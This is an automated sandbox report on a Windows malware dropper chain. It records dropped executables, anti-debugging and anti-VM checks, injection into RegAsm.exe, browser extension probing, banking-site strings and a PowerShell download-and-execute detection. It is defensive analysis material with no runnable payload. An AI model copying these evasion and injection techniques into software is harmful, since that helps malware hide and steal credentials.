Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Memory allocated: CD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Memory allocated: E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Memory allocated: 2A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Memory allocated: 1020000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory allocated: 16B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory allocated: 3060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory allocated: 16B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 9F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 25F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 45F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Memory allocated: F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Memory allocated: 2990000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Memory allocated: 4990000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Memory allocated: 4E60000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_050C0C30 rdtsc

0_2_050C0C30

Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1123	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1055	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1169	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1126	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2160	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window / User API: threadDelayed 443	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window / User API: threadDelayed 533	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window / User API: threadDelayed 408	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window / User API: threadDelayed 498	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window / User API: threadDelayed 515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window / User API: threadDelayed 493	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 4271
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 5526

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\5FheP4L[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1070047001\5FheP4L.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1070053001\0fc5fe7282.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1070052001\26dddb3c83.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1070040001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1070046001\5FheP4L.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1070054001\48967fad90.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

API coverage: 0.0 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 592	Thread sleep count: 67 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 592	Thread sleep time: -134067s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5840	Thread sleep count: 1123 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5840	Thread sleep time: -2247123s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5780	Thread sleep count: 1055 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5780	Thread sleep time: -2111055s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4544	Thread sleep count: 273 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4544	Thread sleep time: -8190000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856	Thread sleep count: 1169 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856	Thread sleep time: -2339169s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4892	Thread sleep count: 1126 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4892	Thread sleep time: -2253126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5936	Thread sleep count: 2160 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5936	Thread sleep time: -4322160s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 3880	Thread sleep count: 443 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 3880	Thread sleep time: -886443s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 5328	Thread sleep count: 533 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 5328	Thread sleep time: -1066533s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 6944	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 5828	Thread sleep count: 284 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 5828	Thread sleep time: -568284s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 1020	Thread sleep count: 408 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 1020	Thread sleep time: -816408s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 6732	Thread sleep count: 498 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 6732	Thread sleep time: -996498s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 4136	Thread sleep count: 515 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 4136	Thread sleep time: -1030515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 1468	Thread sleep count: 493 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe TID: 1468	Thread sleep time: -986493s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe TID: 6312	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe TID: 3704	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe TID: 352	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe TID: 8072	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe TID: 1944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8084	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe TID: 7916	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe TID: 7312	Thread sleep time: -150000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\random.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000007.00000002.3400362659.0000000001023000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: wbaa16.8.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: chrome.exe, 00000013.00000002.2688499616.00004A2C00060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: wbaa16.8.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: wbaa16.8.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: wbaa16.8.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: af53YGc.exe, 0000001D.00000002.2818476473.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx/
Source: wbaa16.8.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: chrome.exe, 00000013.00000002.2728506523.00004A2C010D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB MouseValida
Source: wbaa16.8.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: skotes.exe, 00000007.00000002.3423300072.0000000001B28000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.3423300072.0000000001AF7000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 0000000B.00000002.2694231478.000000000113E000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 00000010.00000002.2729720783.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 00000010.00000002.2729522638.000000000127C000.00000004.00000020.00020000.00000000.sdmp, uniq.exe, 00000017.00000002.2777710828.00000000014BC000.00000004.00000020.00020000.00000000.sdmp, uniq.exe, 00000017.00000002.2777710828.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 0000001D.00000002.2818476473.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.0000000001619000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.00000000015DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000002B.00000002.2842923234.0000000002D98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wbaa16.8.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: msedge.exe, 00000020.00000003.2752222438.00004B08002C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: wbaa16.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: wbaa16.8.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: wbaa16.8.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: wbaa16.8.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: L65uNi1.exe, 0000000B.00000002.2692789174.000000000110C000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.0000000001619000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: wbaa16.8.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: msedge.exe, 00000020.00000002.2770321892.0000023ACD243000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wbaa16.8.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: RegAsm.exe, 0000001B.00000002.3494008212.0000000005373000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu
Source: wbaa16.8.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: wbaa16.8.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: wbaa16.8.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: wbaa16.8.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: mshta.exe, 0000002B.00000002.2842923234.0000000002D98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wbaa16.8.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: wbaa16.8.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: wbaa16.8.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: wbaa16.8.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: wbaa16.8.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: wbaa16.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: wbaa16.8.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: wbaa16.8.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: wbaa16.8.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: wbaa16.8.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: chrome.exe, 00000013.00000002.2695182988.00004A2C006B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=176ab6e6-a1ee-4be1-afcf-3de5b27e5c07
Source: wbaa16.8.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: wbaa16.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: random.exe, 00000000.00000002.2203638120.00000000008C3000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2244022346.0000000001023000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2253260930.0000000001023000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000007.00000002.3400362659.0000000001023000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: wbaa16.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: wbaa16.8.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: chrome.exe, 00000013.00000002.2681492315.0000017695198000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz

Source: C:\Users\user\Desktop\random.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_0584018D Start: 05840318 End: 058401BF

7_2_0584018D

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_050C0C30 rdtsc

0_2_050C0C30

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

Code function: 11_2_004431A0 LdrInitializeThunk,

11_2_004431A0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E6652B mov eax, dword ptr fs:[00000030h]	7_2_00E6652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E6A302 mov eax, dword ptr fs:[00000030h]	7_2_00E6A302
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 10_2_03109875 mov edi, dword ptr fs:[00000030h]	10_2_03109875
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 10_2_031099F2 mov edi, dword ptr fs:[00000030h]	10_2_031099F2
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 15_2_02939875 mov edi, dword ptr fs:[00000030h]	15_2_02939875
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 15_2_029399F2 mov edi, dword ptr fs:[00000030h]	15_2_029399F2
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 22_2_02A5985D mov edi, dword ptr fs:[00000030h]	22_2_02A5985D
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 22_2_02A599DA mov edi, dword ptr fs:[00000030h]	22_2_02A599DA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: mshta.exe PID: 3492, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 380000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

